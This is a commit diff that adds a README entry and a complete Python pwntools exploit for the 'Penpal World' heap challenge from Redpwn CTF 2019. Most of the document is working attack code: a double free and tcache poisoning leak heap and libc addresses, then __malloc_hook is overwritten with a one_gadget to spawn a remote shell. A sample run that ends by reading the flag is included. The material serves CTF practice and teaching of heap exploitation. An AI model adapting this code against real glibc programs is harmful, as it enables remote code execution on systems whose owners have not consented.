Penpal world upload

Author: KaoRz

README.md

@@ -12,6 +12,7 @@
 | PWN - Old Bridge HackTheBox challenge | [Old Bridge exploit](../master/oldbridge_hackthebox_challenge/oldbridge_HTB.zip) |
 | Lottery - UAD360 CTF | [Lottery exploit](../master/lottery_UAD360/exploit.py) |
 | Agenda - UAD360 CTF | [Agenda exploit](../master/agenda_UAD360/exploit.py) |
+| Penpal World - Redpwn CTF 2019 | [Penpal World exploit](../master/penpal_world_redpwnCTF2019/exploit.py) |
 
 | Vulnerabilities | Exploit |
 | --- | --- |

penpal_world_redpwnCTF2019/exploit.py

@@ -0,0 +1,97 @@
+#!/usr/bin/python
+from pwn import *
+
+context.terminal = ['tmux', 'sp', '-h']
+# context.log_level = 'DEBUG'
+
+elf   = ELF('./penpal_world')
+libc  = ELF('./libc-2.27.so', checksec = False)
+local = False
+
+if local == True:
+    ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so', checksec = False)
+    io = process([ld.path, elf.path], env = {"LD_PRELOAD": libc.path}) 
+else:
+    io = remote("chall2.2019.redpwn.net", 4010)
+
+def add_postcard(idx):
+    io.recvuntil('4) Read a postcard\n')
+    io.sendline('1')
+    io.recvuntil('Which envelope #?\n')
+    io.sendline(str(idx))
+
+def edit_postcard(idx, content):
+    io.recvuntil('4) Read a postcard\n')
+    io.sendline('2')
+    io.recvuntil('Which envelope #?\n')
+    io.sendline(str(idx))
+    io.recvuntil('Write.\n')
+    io.send(content)
+
+def free_postcard(idx):
+    io.recvuntil('4) Read a postcard\n')
+    io.sendline('3')
+    io.recvuntil('Which envelope #?\n')
+    io.sendline(str(idx))
+
+def show_postcard(idx):
+    io.recvuntil('4) Read a postcard\n')
+    io.sendline('4')
+    io.recvuntil('Which envelope #?\n')
+    io.sendline(str(idx))
+
+add_postcard(0)
+add_postcard(1)
+free_postcard(0)
+free_postcard(1)
+
+show_postcard(1)
+chunk = u64(io.recvuntil('\n', drop = True).ljust(8, '\x00')) - 0x10
+log.success('Leaked second chunk address: ' + hex(chunk))
+
+edit_postcard(1, p64(chunk - 0x250 + 0x10))
+
+add_postcard(1)
+add_postcard(0)
+free_postcard(1)
+
+log.progress('Filling TCACHE bin...')
+for i in range(7):
+    free_postcard(0)
+
+free_postcard(0)
+show_postcard(0)
+leak_arena = u64(io.recvuntil('\n', drop = True).ljust(8, '\x00'))
+libc.address = leak_arena - 0x3ebca0
+log.success('Leaked main_arena+96 address: ' + hex(leak_arena))
+log.info('GLIBC base address: ' + hex(libc.address))
+log.info('__malloc_hook address: ' + hex(libc.sym["__malloc_hook"]))
+
+edit_postcard(1, p64(libc.sym["__malloc_hook"]))
+add_postcard(1)
+add_postcard(1)
+edit_postcard(1, p64(libc.address + 0x10a38c))
+
+add_postcard(1)
+
+io.interactive()
+io.close()
+
+'''
+xxx@xxx:/xxx/penpal$ python xpl.py 
+[*] 'xxx/penpal_world'
+    Arch:     amd64-64-little
+    RELRO:    Full RELRO
+    Stack:    Canary found
+    NX:       NX enabled
+    PIE:      PIE enabled
+[+] Opening connection to chall.2019.redpwn.net on port 4010: Done
+[+] Leaked second chunk address: 0x55c275124250
+[-] Filling TCACHE bin...
+[+] Leaked main_arena+96 address: 0x7f12669b0ca0
+[*] GLIBC base address: 0x7f12665c5000
+[*] __malloc_hook address: 0x7f12669b0c30
+[*] Switching to interactive mode
+$ cat flag.txt
+flag{0h_n0e5_sW1p3r_d1D_5w!peEEeE}
+'''